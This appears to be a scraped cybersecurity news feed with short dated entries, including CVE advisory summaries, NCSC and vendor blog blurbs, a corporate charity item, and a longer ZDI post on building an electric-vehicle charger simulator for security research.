Employees at TransUnion in the UK, a global information and insights company, raised an impressive £44,812 for charity organisations in 2024. Last year, TransUnion in the UK announced Andy’s Man Club as their Charity of the Year. The charity works to eliminate stigma around mental health by creating a judgement-free confidential space where men can be open about their challenges. The charity was chosen by the vast majority of colleagues as their charity of the year and TransUnion has decided to extend this support for Andy’s Man Club to continue spreading awareness and raising the much-needed funds throughout 2025. Over the last 12 months, TransUnion colleagues have participated in a variety of fundraising activity, including the 26-mile Yorkshire Three Peaks challenge, a charity football tournament, sponsored Edale Skyline walk, charity bake sales and The Great North Run – all helping to raise the £44,812 grand total. Although Andy’s Man Club is TransUnion’s charity of the year, colleagues are encouraged to support other causes that are close to their hearts too. Consequently, some of the proceeds also go towards other local charities and causes. TransUnion also offers colleagues three paid volunteering days per year, as part of their commitment to giving back to local communities. Kaushik Gopalan, Chief Human Resources Officer at TransUnion in the UK, added: “We encourage employees to raise both awareness and funds for charities and causes close to their hearts. We’re proud to say that more than 226 colleagues have used almost 2,000 volunteering hours in 2024 to support their volunteering and fundraising efforts. “At TransUnion, we remain committed to prioritising the well-being of our employees. Mental health is a fundamental part of overall well-being; through our work with Andy’s Man Club, we’ve been able to further our internal education and encourage normalising difficult conversation. Building awareness for mental health and prioritising wellness in the workplace is something we are dedicated to year long. Alongside our fundraising efforts, we have been proactive to ensure our colleagues are aware of the support available to them by hosting a number of in-person or virtual sessions in both our Leeds and London offices.”

https://newsroom.transunion.co.uk/transunion-uk-raises-almost-45000-for-local-charities/
NSFOCUS Unveils AI-Driven Security Solutions at HKIB 2025 Cybersecurity Solutions Day
2025-03-21T10:11:18Z | 1742551878

Hong Kong, March 21, 2025 – The Hong Kong Institute of Bankers (HKIB) 2025 Cybersecurity Solutions Day kicked off on March 20, drawing over 600 executives and experts from financial institutions and cybersecurity domains to explore strategies for bolstering the financial sector’s security posture. NSFOCUS, a global leader in cybersecurity, marked its third consecutive participation in […] The post NSFOCUS Unveils AI-Driven Security Solutions at HKIB 2025 Cybersecurity Solutions Day appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-unveils-ai-driven-security-solutions-at-hkib-2025-cybersecurity-solutions-day/
Digiallkirjastamine nutitelefonis on nüüd veelgi mugavam
2025-03-21T08:05:47Z | 1742544347

RIA DigiDoc mobiilirakenduse uues versioonis 2.7.0 täiendati olemasolevaid funktsioone ning lisati võimalus allkirjastada ID-kaardiga NFC-tehnoloogia abil. Uuendus muudab allkirjastamise kasutajatele oluliselt mugavamaks ja kontaktivabaks, pakkudes alternatiivi kaardilugejaga allkirjastamisele.

https://ria.ee/uudised/digiallkirjastamine-nutitelefonis-nuud-veelgi-mugavam
Chromium: CVE-2025-2476 Use after free in Lens
2025-03-21T07:00:43Z | 1742540443

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-2476
CVE-2025-29795 Microsoft Edge (Chromium-based) Update Elevation of Privilege Vulnerability
2025-03-21T07:00:00Z | 1742540400

Improper link resolution before file access ('link following') in Microsoft Edge (Chromium-based) allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29795
CVE-2025-29806 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
2025-03-21T07:00:00Z | 1742540400

No cwe for this issue in Microsoft Edge (Chromium-based) allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29806
TSUBAME Report Overflow (Oct-Dec 2024)
2025-03-21T06:00:00Z | 1742536800

This TSUBAME Report Overflow series discuss monitoring trends of overseas TSUBAME sensors and other activities which the Internet Threat Monitoring Quarterly Reports does not include. This article covers the monitoring results for the period of October to December 2024. Observation...

https://blogs.jpcert.or.jp/en/2025/03/tsubame_overflow_2024-10-12.html
Security Alert (A25-03-20): Vulnerability in Veeam Backup and Replication Products
2025-03-21T04:00:00Z | 1742529600

Veeam has published security advisory to address vulnerability in Veeam Backup and Replication products.

https://www.govcert.gov.hk/en/alerts_detail.php
What’s New in TeamCity 2025.03: Recipes, Improved Docker and Podman Integration, UI Updates, and More
2025-03-20T15:31:00Z | 1742484660

TeamCity’s first major release of the year, version 2025.03, is now available. It’s packed with new features, including massive UI updates, a new Run in Docker build feature, and JetBrains-crafted recipes available in our Marketplace. UI updates In line with our commitment to make TeamCity easier and more intuitive to use, this release introduces significant […]

https://blog.jetbrains.com/teamcity/2025/03/what-s-new-in-teamcity-2025-03-recipes-improved-docker-and-podman-integration-ui-updates-and-more/
Windows Shell Link Vulnerability ZDI-CAN-25373: Detecting Hidden Commands
2025-03-20T13:31:33Z | 1742477493

One of the latest vulnerabilities disclosed by TrendMicro, ZDI-CAN-25373, exposes a flaw in Windows shortcut (.LNK) files that allow attackers to conceal malicious commands. This zero-day vulnerability, disclosed by Trend Micro’s Zero Day Initiative, demonstrates how a legitimate Windows feature—shortcut files—is being weaponized by threat actors.Unlike traditional LNK-based attacks, where shortcut properties can be inspected [...] The post Windows Shell Link Vulnerability ZDI-CAN-25373: Detecting Hidden Commands appeared first on Logpoint.

https://www.logpoint.com/en/blog/windows-shell-link-vulnerability-zdi-can-25373-detecting-hidden-commands/
Akamai Named a Leader in the Latest Forrester Report for WAF Solutions
2025-03-20T13:00:00Z | 1742475600

https://www.akamai.com/blog/security/2025/mar/akamai-named-leader-latest-forrester-report-waf-solution
AI Cybersecurity: How to Protect Against Persistent Traditional Threats Enhanced by AI
2025-03-20T10:10:19Z | 1742465419

AI has transformed traditional cybersecurity threats like ransomware, phishing, and supply chain attacks, making them faster, more precise, and more scalable. These familiar threats are now amplified by AI’s ability to analyze, adapt, and optimize attack strategies in real-time. AI-enhanced ransomware, for instance, encrypts critical data while evading detection, prolonging recovery efforts. In phishing, AI […] The post AI Cybersecurity: How to Protect Against Persistent Traditional Threats Enhanced by AI appeared first on CounterCraft.

https://www.countercraftsec.com/blog/ai-enhanced-cybersecurity-threats-defense-strategies/
Operation FishMedley
2025-03-20T10:00:00Z | 1742464800

ESET researchers detail a global espionage operation by FishMonger, the APT group run by I‑SOON

https://www.welivesecurity.com/en/eset-research/operation-fishmedley/
Setting direction for the UK's migration to post-quantum cryptography
2025-03-20T08:00:56Z | 1742457656

Why the key milestones for PQC migration are part of building and maintaining good cyber security practice.

https://www.ncsc.gov.uk/blog-post/setting-direction-uk-migration-to-pqc
Detecting and Mitigating Apache Tomcat CVE-2025-24813
2025-03-20T08:00:00Z | 1742457600

https://www.akamai.com/blog/security-research/2025/mar/march-apache-tomcat-path-equivalence-traffic-detections-mitigations
A different future for telecoms in the UK
2025-03-20T07:44:47Z | 1742456687

NCSC Technical Director Dr Ian Levy explains the technical impact of the recent US sanctions on the security of Huawei equipment in the UK.

https://www.ncsc.gov.uk/blog-post/a-different-future-for-telecoms-in-the-uk
Security, complexity and Huawei; protecting the UK's telecoms networks
2025-03-20T07:42:41Z | 1742456561

With 5G set to transform mobile services, Ian Levy explains how the UK has approached telecoms security, and what that means for the future.

https://www.ncsc.gov.uk/blog-post/blog-post-security-complexity-and-huawei-protecting-uks-telecoms-networks
Use of Russian technology products and services following the invasion of Ukraine
2025-03-20T07:41:46Z | 1742456506

Cyber security – even in a time of global unrest – remains a balance of different risks. Ian Levy, the NCSC's Technical Director, explains why.

https://www.ncsc.gov.uk/blog-post/use-of-russian-technology-products-services-following-invasion-ukraine
The future of telecoms in the UK
2025-03-20T07:40:55Z | 1742456455

NCSC Technical Director Dr Ian Levy explains how the security analysis behind the DCMS supply chain review will ensure the UK’s telecoms networks are secure – regardless of the vendors used.

https://www.ncsc.gov.uk/blog-post/the-future-of-telecoms-in-the-uk
So long and thanks for all the bits
2025-03-20T07:39:55Z | 1742456395

Ian Levy, the NCSC’s departing Technical Director, discusses life, the universe, and everything.

https://www.ncsc.gov.uk/blog-post/so-long-thanks-for-all-the-bits
TLS 1.3: better for individuals - harder for enterprises
2025-03-20T07:38:30Z | 1742456310

The NCSC's technical director outlines the challenges that TLS 1.3 presents for enterprise security.

https://www.ncsc.gov.uk/blog-post/tls-13-better-individuals-harder-enterprises
Cybersecurity and digital transformation: how local authorities can rise to the challenge of resilience
2025-03-20T06:00:17Z | 1742450417

Local authorities are particularly exposed to cyber-threats, with major risks such as paralysed public services and citizens’ compromised sensitive data. According to a recent study by Cybermalveillance.gouv.fr, although the majority of businesses are aware of the cyber-threat issue, they are still failing to make appropriate investments... The post Cybersecurity and digital transformation: how local authorities can rise to the challenge of resilience appeared first on Stormshield.

https://www.stormshield.com/news/cybersecurity-and-digital-transformation-how-local-authorities-can-rise-to-the-challenge-of-resilience/
ZDI-25-173: (0Day) Luxion KeyShot DAE File Parsing Access of Uninitialized Pointer Remote Code Execution Vulnerability
2025-03-20T05:00:00Z | 1742446800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2530.

http://www.zerodayinitiative.com/advisories/ZDI-25-173/
ZDI-25-174: (0Day) Luxion KeyShot DAE File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability
2025-03-20T05:00:00Z | 1742446800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2531.

http://www.zerodayinitiative.com/advisories/ZDI-25-174/
ZDI-25-175: (0Day) Luxion KeyShot USDC File Parsing Use-After-Free Remote Code Execution Vulnerability
2025-03-20T05:00:00Z | 1742446800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2532.

http://www.zerodayinitiative.com/advisories/ZDI-25-175/
Security Alert (A25-03-19): Vulnerability in Google Chrome
2025-03-20T04:00:00Z | 1742443200

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
By Executive Order, We Are Banning Blacklists - Domain-Level RCE in Veeam Backup & Replication (CVE-2025-23120)
2025-03-20T02:51:10Z | 1742439070

It’s us again! Once again, we hear the collective groans - but we're back and with yet another merciless pwnage of an inspired and clearly comprehensive RCE solution - no, wait, it's another vuln in yet another backup and replication solution..While we would

https://labs.watchtowr.com/by-executive-order-we-are-banning-blacklists-domain-level-rce-in-veeam-backup-replication-cve-2025-23120/
Open Call para o Advisory Group da ENISA
2025-03-20T00:00:00Z | 1742428800

Está a decorrer, até 26 de março, o processo de candidatura para fazer parte do Advisory Group da Agência da União Europeia para a Cibersegurança (ENISA). A call destina-se a profissionais experientes em cibersegurança com conhecimentos relevantes para a missão da ENISA. As candidaturas estão abertas para o novo mandato do Advisory Group (AG), que vai ter um papel fundamental na definição de grandes iniciativas europeias, incluindo a implementação da Diretiva NIS2 e do Cyber Resilience Act.   O Advisory Group integra especialistas da indústria, do meio académico, de empresas e grupos de consumidores, bem como membros nomeados, para apoiar a ENISA na definição dos seus objetivos estratégicos, na elaboração do seu programa de trabalho e na comunicação com as principais partes interessadas.   Mais informações    

https://dyn.cncs.gov.pt/pt/detalhe/art/135917/open-call-para-o-advisory-group-da-enisa
Shedding light on the ABYSSWORKER driver
2025-03-20T00:00:00Z | 1742428800

Elastic Security Labs describes ABYSSWORKER, a malicious driver used with the MEDUSA ransomware attack-chain to disable anti-malware tools.

https://www.elastic.co/security-labs/abyssworker
Beyond Configuration Perfection: Redefining ‘Cloud Security’ by Kat Traxler
2025-03-20T00:00:00Z | 1742428800

Fixing misconfigurations isn’t enough. Over-focusing on perfection can create blind spots. Discover a smarter, holistic approach to cloud security.

https://www.vectra.ai/blog/beyond-configuration-perfection-redefining-cloud-security
GreyNoise Observes Active Exploitation of Critical Apache Tomcat RCE Vulnerability (CVE-2025-24813)
2025-03-20T00:00:00Z | 1742428800

Attackers are actively exploiting Apache Tomcat servers by leveraging CVE-2025-24813, a newly disclosed vulnerability that, if successfully exploited, could enable remote code execution (RCE). GreyNoise has identified multiple IPs engaging in this activity across multiple regions.

https://www.greynoise.io/blog/active-exploitation-critical-apache-tomcat-rce-vulnerability-cve-2025-24813
Government Data Breaches: The Ripple Effect That Could Have Been Avoided
2025-03-19T18:42:24Z | 1742409744

A breach has rocked the government sector. Confidential data has been stolen, critical systems have been compromised, and the impact is rippling through agencies. The attack was a sophisticated advanced persistent threat (APT) that lurked undetected for months. But how did it happen? To find out, we must trace the...

https://www.netscout.com/blog/government-data-breaches-ripple-effect-could-have-been-avoided
Building an electric vehicle simulator to research EVSEs
2025-03-19T18:40:54Z | 1742409654

Researching and reverse engineering Level 2 Electric Vehicle Supply Equipment (EVSE or loosely “charger”) efforts might require the equipment to be placed beyond the idle state. The idle state is straightforward and usually involves nothing more than powering up the charger. Indeed, this is a very useful state for research where the user interface is in operation, communications both wired and wireless are working and the mobile device app can interact. However, there are times when there is a need to force the charger into other states so that it behaves as though the electric vehicle is attached, the EV is asking for charge, or the EV is charging and the EVSE is providing charging current.  At the Pwn2Own Automotive 2025 event, an add-on category was introduced that required a demonstration of an exploit while the equipment was in the charging state. This required manipulation of the charger via the charging cable in order to enter this charging state. This blog describes the device that we assembled to achieve this requirement. I will cover the design considerations that were made along with how the device operates. I will also provide the specifics on parts that we used; however, due to the wide range of requirements different researchers might have and substitutions they might make, I will only highlight the important points of the design and not describe this as a “step-by-step” build.  As an example of a minimal “simulator” build, some chargers have been observed to provide an output signal when the charging cable attaches to the vehicle. If your research only involves this signal, then a diode and a single resistor inside your EV simulator enclosure may be enough to achieve your goal. So, understand our device first and then use that knowledge to build what you require for your research. SafetyFirst and foremost is safety. If you are familiar with researching EVSE, you know that you will be dealing with deadly voltages. This is the case here as well. Even more dangerous is the fact that the EV simulator will enable the high voltage onto the charging cable and inside the simulator itself. This increases the number of components that have high voltage and thus increases the danger. Every precaution and safety measure should be taken in dealing with high voltage and high current. If you are not knowledgeable and confident with working around deadly high voltages or are not sure of appropriate safety measures, do not attempt to build a simulator or work with EVSE. An alternative might be to educate yourself and ask others with the appropriate qualifications for help.  As we were about to publish this blog, we found some pre-built devices that are limited but might still be an option for some.  These are listed in the “Pre-Built Alternatives” section below.Basic OperationThe EV simulator is based on SAE J1772 operation. There are other standards that define EVSE to EV connections but our focus in this blog is strictly J1772. The basic information needed can be found here. The key items this implies are:J1772-2009 connector is used. Control signaling (over the Control Pilot signal) is strictly PWM/duty cycle.If you study the wiki link above, you will see that the EV communicates to the EVSE on the CP line via a resistor network in the vehicle. The EVSE will sense a resistance to determine if the cable is connected to the EV (2740 ohms) and if the vehicle wants charging (882 ohms). On the flip side, the EVSE provides a 1kHz PWM signal to the vehicle to indicate the maximum current that the EVSE is willing to provide to the EV. This is done through the duty cycle of the signal. The duty cycle to current mapping is defined by J1772.The EV simulator provides the proper resistance values using a rotary switch and monitors the PWM signal with a low-cost onboard oscilloscope. These parts reside on or inside a plastic enclosure to provide safety from high voltage and anchor the main components.In our EV simulator, the rotary switch is set to “0” when we want to simulate a disconnected cable. It is set to “1” to simulate a connection to a vehicle but no charge being requested. Finally, it is set to “2” to simulate a connected vehicle requesting a charge. These are the only three states that we decided to incorporate into our simulator. Figure 1 – The EV Simulator at the time of P20 Automotive Tokyo 2025 PartsThis is a list of components that we used to build our EV simulator and their links to Amazon USA. The resistors come in a kit, and we used 2700ohm for the 2740ohm requirement and 820ohm for the 882ohm requirement. These approximate values appeared to work on the EVSEs that we tested. However, you could find a more particular EVSE that needs values closer to the specification. In that case, you could combine other resistors in the kit to get closer to the specification.As for the diode, you should try to use the one we used or one with even lower Vf specification. This diode worked with all of the chargers we were able to test. We tried higher Vf diodes with limited success. Some chargers were more tolerant of a higher Vf but many were not. The diode is required because most EVSE will test for its existence as a safety measure. ·      Project box: LeMotech Junction Box ·      Receptacle: J1772 receptacle ·      Resistor 2740 ohm and 882 ohm: Chanzon 300 Piece Resistor Kit·      Diodes: Chanzon 1N5817 Schottky Barrier Rectifier Diodes·      Rotary switch: Taiss Universal Changeover Switch·      Volt/Amp Meter: DROK Volt Amo Meter·      Oscilloscope: FNIRSI DSO152 Oscilloscope ·      Load Plug: 20FT NEMA 6-15P/6-15R Power Extension Cord·      Load: Cadet F Series Baseboard HeaterConsiderationsA few of the items are not strictly necessary but do help in verifying the simulator is working as expected. Substitutions are also possible depending on your needs.The bare minimum is the enclosure, the J1772 receptacle, and the proper resistor and diode values. How you manipulate the resistor network, monitor the PWM signal, and if you do or do not implement a load is flexible and up to you.Assembly of (Our) EV SimulatorOur initial step in assembly was to drill or cut holes into the plastic enclosure. Placement isn’t critical; however, we did attempt to make things ergonomic and to not block the indicators with cables or our hands while manipulating the switch. Secondly, we connected the resistors and diode to the rotary switch and mounted that assembly inside the enclosure. This circuit connects to the Control Pilot (CP) and Protective Earth (PE) inside the enclosure. Figure 2 – Schematic of components connected to the rotary switch. Again, this was our implementation. We left S0 on our switch open to simulate a cable in the unconnected state without having to physically plug and unplug the cable. We also chose to control the two resistor states (S1 and S2) separately. The schematic in the wiki shows a different configuration in which only one toggle is required, and the values of the resistors are adjusted.  Both are valid so build based on your constraints. Finally, as seen in the schematic, we did not utilize states 3 -5 on the rotary switch because the additional charging states were not needed for our research at the time.Next, the J1772 receptacle needs to be wired. Figure 3 – The J1772 charge connector as seen from the open end If you choose not to add a load to the simulator, the wiring is fairly easy. You only need to bring out the Control Pilot (CP) signal and the Protective Earth (PE) from the back of the connector. If you want to include a simulated battery load, you will need to also bring out the two high voltage lines (L1 and L2/N) with the appropriate size wire (remember, these can be high current depending on the load you pick). We conservatively used a 12-gauge wire, and our anticipated load was 500W. L1 and L2/N were then routed out of the enclosure to a plug so that the 500W load could be removed or added at will. The plug (in the material list above) was a heavy-duty extension cord that we cut and hardwired to the enclosure on one side and to the load on the other side. We also included a Volt/Amp meter to monitor the J1772 receptacle. When the EVSE engaged charging, the meter would show 230V (in our case) and 2.2A if the load was attached otherwise, 0A. Finally, an inexpensive battery-powered oscilloscope was attached with double-sided tape to the front of the enclosure. The probe cable was routed inside to monitor the PWM signal present on the CP wire. This simple scope defaulted to displaying several measurements, which included a duty cycle, so it was a good fit for this purpose. Other than pressing “Auto Set” once the 1KHz signal was present, there was no other configuration required.Thus, the full enclosure schematic is: Figure 4 – The full schematic of our EV simulator TargetsThis EV simulator was evaluated on all of the targets used at Pwn2Own Automotive 2025. This included Level 2 chargers from Autel, ChargePoint, WOLFBOX, Emporia, Ubiquity, and Tesla (with NACS adaptor). All the EVSE devices were successfully placed into the charging state and 500W was provided to the load using this simulator.Pre-Built Alternatives As mentioned in the “Safety” section, we noticed a few consumer devices, which might be adequate for some research and would avoid having to assemble any parts. These devices appear to be designed primarily to charge electric scooters from an EVSE. To do this, they effectively provide the minimum circuit to enable the EVSE to energize the cable. Note that these do not provide a direct way to measure the CP signal.  Always follow the manufacturer’s safety instructions when using these devices.·      220V J1772 Type1 Socket to NEMA 5-15/5-20 EV Charger Adapter·      J1772 to Nema 5-20, EV Station Charging AdapterFinal Thoughts The J1772 standard is straightforward to implement for the limited purpose of emulating an attached vehicle to these chargers. There are more sophisticated protocols on the horizon (CAN over the CP signal) but most of the consumer-grade EVSEs continue to utilize J1772. Additionally, with such a large established base of J1772, support from the EVSEs and the EVs will likely continue far into the future.  Hopefully, this blog describing our design considerations and how we built our EV simulator will simplify the process for other researchers. While official contest specifics are still months away for the Pwn2Own Automotive event for 2026, there will almost certainly be a contest category for using the charging cable as the attack surface again. This was a highlighted addition to the 2025 event over 2024 and we hope to build on that for 2026.Until then, you can follow us on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

https://www.thezdi.com/blog/2025/3/14/building-an-electric-vehicle-simulator-to-research-evses
Cybersecurity Frameworks: Key Features and Benefits
2025-03-19T16:32:31Z | 1742401951

A look at recent headlines proves that no industry is safe from ransomware attacks and sophisticated cyberattacks. These threats—and those still being crafted by creative attackers—continue to keep cybersecurity professionals awake at night. That’s why security teams need to have every tool at their disposal to protect their critical information, customer data, and reputation.

https://www.zentera.net/blog/cybersecurity-frameworks-key-features-and-benefits
Email Filtering Optimization: A Data443 Success Story
2025-03-19T16:31:26Z | 1742401886

Email filtering is not just a nice-to-have feature—it’s a critical component of any organization’s security infrastructure. With email-borne threats accounting for 80% of security breaches in the past year, the stakes couldn’t be higher. The post Email Filtering Optimization: A Data443 Success Story appeared first on Data443.

https://data443.com/email-filtering-optimization-a-data443-success-story/
What Is Load-time Function Randomization? Beyond ASLR
2025-03-19T15:47:27Z | 1742399247

Modern software is facing major cybersecurity challenges, with memory safety vulnerabilities being one of the biggest risks. Even with billions invested in advanced security tools, attacks targeting memory vulnerabilities are still common. Studies show that 70% of vulnerabilities in compiled code are memory safety vulnerabilities. Load-time Function Randomization (LFR), a type of runtime exploit prevention, […] The post What Is Load-time Function Randomization? Beyond ASLR appeared first on RunSafe Security.

https://runsafesecurity.com/blog/what-is-load-time-function-randomization/
The Hidden Costs and Ethical Pitfalls of Content Scraping
2025-03-19T15:00:00Z | 1742396400

Read about the significant hidden costs and ethical pitfalls of content scraping ? and learn how to protect your website.

https://www.akamai.com/blog/security/2025/mar/the-hidden-costs-and-ethical-pitfalls-of-content-scraping
Why You Need a VAPT Tool with a RASP Tool for Unmatched Security
2025-03-19T14:56:10Z | 1742396170

Introduction: The illusion of security Imagine building a high-tech security fence around your house but leaving open doors and windows with crumbling roofs. Would you still feel safe? That’s precisely what happens when organizations deploy Runtime Application Self-Protection (RASP) without Vulnerability Assessment and Penetration Testing (VAPT).

https://www.appknox.com/blog/why-only-having-a-rasp-tool-is-never-enough-for-security
TeamCity Roadmap 2025: Updating the UI, TeamCity Recipes, and Much More
2025-03-19T14:32:32Z | 1742394752

This year, the TeamCity team is working on a number of new initiatives, including updating the UI, TeamCity recipes, Jenkins migration tools, and many others. Read on to learn what our focus is for 2025. Modernizing the TeamCity Enterprise interface In 2025, we’re taking a major step forward in enhancing the TeamCity experience. The modern […]

https://blog.jetbrains.com/teamcity/2025/03/teamcity-roadmap-2025/
Abiellumise info jälgimine muutus mugavamaks
2025-03-19T14:06:20Z | 1742393180

Riigiportaali eesti.ee abiellumise sündmusteenus on saanud täienduse, mis võimaldab kasutajatel abiellumisega seotud menetlusteavet paremini jälgida ja protsessi mugavamalt hallata.

https://ria.ee/uudised/abiellumise-info-jalgimine-muutus-mugavamaks
Cyber chiefs unveil new roadmap for post-quantum cryptography migration
2025-03-19T10:34:00Z | 1742380440

New guidance from the NCSC outlines a three-phase timeline for organisations to transition to quantum-resistant encryption methods by 2035.

https://www.ncsc.gov.uk/news/pqc-migration-roadmap-unveiled
The sixth sense for cyber defense: Multimodal AI
2025-03-19T10:30:41Z | 1742380241

Sophos X-Ops’ research, presented at Virus Bulletin 2024, uses ‘multimodal’ AI to classify spam, phishing, and unsafe web content

https://news.sophos.com/en-us/2025/03/19/the-sixth-sense-for-cyber-defense-multimodal-ai/
CVE-2024-49119 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-03-19T07:00:00Z | 1742367600

Added acknowledgements. This is an informational change only.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49119
JSAC2025 -Day 2-
2025-03-19T06:00:00Z | 1742364000

Continuing from the previous blog article, this entry introduces the presentations on the 2nd day of JSAC2025. Observation of phishing criminal groups related to illegal money transfers and Mizuho Bank’s countermeasures -Fighting against phishing site malware ‘KeepSpy’- Speaker: Tsukasa Takeuchi,...

https://blogs.jpcert.or.jp/en/2025/03/jsac2025day2.html
Cryptominers? Anatomy: Analyzing Cryptominers
2025-03-19T06:00:00Z | 1742364000

https://www.akamai.com/blog/security-research/2025/mar/cryptominer-analyzing-samples-active-campaigns
Security Alert (A25-03-18): Multiple Vulnerabilities in PHP
2025-03-19T04:00:00Z | 1742356800

PHP has released security advisories to address multiple vulnerabilities in PHP.

https://www.govcert.gov.hk/en/alerts_detail.php
Cisco to Deliver Secure AI Infrastructure with NVIDIA
2025-03-18T20:00:00Z | 1742328000

Cisco today unveiled an AI factory architecture with NVIDIA that puts security at its core.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/cisco-and-nvidia-secure-AI-factory.html
Embracing the AI Era: Cisco Secure AI Factory with NVIDIA
2025-03-18T20:00:00Z | 1742328000

Cisco and NVIDIA partner to revolutionize AI infrastructure, transforming AI Factory deployments with tailored, secure, and simple-to-operate solutions.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/embracing-the-ai-era-cisco-secure-ai-factory-with-nvidia.html
Cisco to Deliver Secure AI Infrastructure with NVIDIA
2025-03-18T20:00:00Z | 1742328000

Cisco today unveiled an AI factory architecture with NVIDIA that puts security at its core.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/cisco-and-nvidia-secure-AI-factory.html
Cisco to Deliver Secure AI Infrastructure with NVIDIA
2025-03-18T20:00:00Z | 1742328000

Cisco today unveiled an AI factory architecture with NVIDIA that puts security at its core.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/cisco-and-nvidia-secure-AI-factory.html
Cisco to Deliver Secure AI Infrastructure with NVIDIA
2025-03-18T20:00:00Z | 1742328000

Cisco today unveiled an AI factory architecture with NVIDIA that puts security at its core.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/cisco-and-nvidia-secure-AI-factory.html
What is Infrastructure Intelligence?
2025-03-18T18:33:21Z | 1742322801

Cyber threats are growing in sophistication, and adversaries are continually evolving their methods, targeting businesses, governments, and individuals with precision. For network defenders and fraud prevention teams, understanding this evolving landscape is critical to preempt attacks, mitigate risks, and protect key assets. But how do you stay ahead of these relentless attackers? The answer lies in HYAS's Infrastructure Intelligence. This blog defines the concept of Infrastructure Intelligence, and establishes its components and how they empower security teams with unmatched visibility into adversary infrastructure. By leveraging Infrastructure Intelligence, organizations can turn raw data into actionable insights to detect, prevent, and respond to threats better than ever before. Understanding Infrastructure Intelligence At its core, Infrastructure Intelligence provides a detailed view of the infrastructure used by adversaries to plan and execute cyberattacks. It includes data related to adversary techniques and operations, enabling organizations to uncover critical details of attack campaigns. Infrastructure Intelligence goes beyond traditional datasets offered by most threat intelligence feeds. It consolidates multiple layers of information and correlates them to deliver a contextualized understanding of cyber threats. Here are the five key elements that define Infrastructure Intelligence: 1. Details on Attacker Infrastructure The foundation of Infrastructure Intelligence lies in identifying the infrastructure footprint of malicious actors. This includes: Passive DNS Data: Historical records of DNS queries, enabling investigators to trace domains used in past attacks. WhoIs Records: Ownership and registration details of domains involved in malicious activities. Certificate Data: SSL certificates that shed light on the configuration of adversary infrastructure and shared resources. Such information serves as the bedrock for tracing adversary origins and methods, and is not unlike the internet intelligence providers going back to the early days of companies like RiskIQ. 2. Enhanced Datasets for Advanced Threat Analysis While traditional internet intelligence (e.g., passive DNS or WhoIs data) remains valuable, Infrastructure Intelligence extends far beyond this: Command and Control (C2) Infrastructure: Insights into adversaries’ malicious servers and tools used for attack coordination. Specialized WhoIs and Geospatial Data: Granular exclusive datasets offering unmatched visibility into attacker identify, location, and behavior. Internal Account Details: Data from private sources to link threat activity to specific aliases and unique IOCs. Malware Infrastructure: Comprehensive details on new malware infrastructure, providing teams with better information on malware families and related context to effectively block new and existing threats. These expanded datasets enable investigators with an ability to detect and respond to threat actor activity with new levels of precision. 3. Correlating Data to Manufacture Better Context Infrastructure Intelligence is not just about collecting data; it’s about connecting the dots. It correlates diverse intelligence "nuggets" and generates a more unified view of threats. For example, imagine uncovering a domain linked to phishing attacks. Infrastructure Intelligence fingerprints past DNS resolutions and connects that domain to command-and-control servers, associated IP addresses, and related malware samples. It provides details about the identity and behavior of attackers that can lead directly to the take-down of their infrastructure and follow-on law enforcement actions. This correlation helps security teams see not just isolated events but the broader adversary ecosystem, and take active threat actors off the grid. 4. Answering Key Questions with a Proven "VRA" Model Effective Infrastructure Intelligence provides answers to three critical questions commonly posed by threat hunters, fraud prevention investigators, and mission-specific teams in federal agencies and law enforcement: Verdicts on Indicators of Compromise (IOCs): Is this IP, domain, or observable malicious, benign, or suspicious? What evidence is available to support this assertion? Related Infrastructure: What other domains, IPs, or networks are associated with this activity? Connecting a piece of known-bad intelligence into a larger picture can be priceless in terms of protecting your organization. Threat Actor Information: Who is behind the attack? What can we ascertain about their goals and motivations, and also their behavior and identity? When attribution matters (I am looking at you fraud investigators and government types), there is no substitute for Infrastructure Intelligence. This framework, often referred to as the "VRA" model (Verdict, Related Infrastructure, Actor Information), makes HYAS Infrastructure Intelligence essential in uncovering threats and proactively mitigating risks. 5. Geospatial and Behavioral Insights To truly elevate your understanding of your adversary, Infrastructure Intelligence matrixes additional intelligence layers against the insights described above in several other ways: Geospatial Data: Pinpoint attacker locations to understand geographic footprints of campaigns and the spatial correlation of attacker activity with wifi networks, other adversaries, and more. Behavior-Based Indicators: Identify unusual network behaviors and patterns linked to adversarial activity. These insights put the cherry on top of the Infrastructure Intelligence sundae, transforming raw technical data into actionable intelligence, 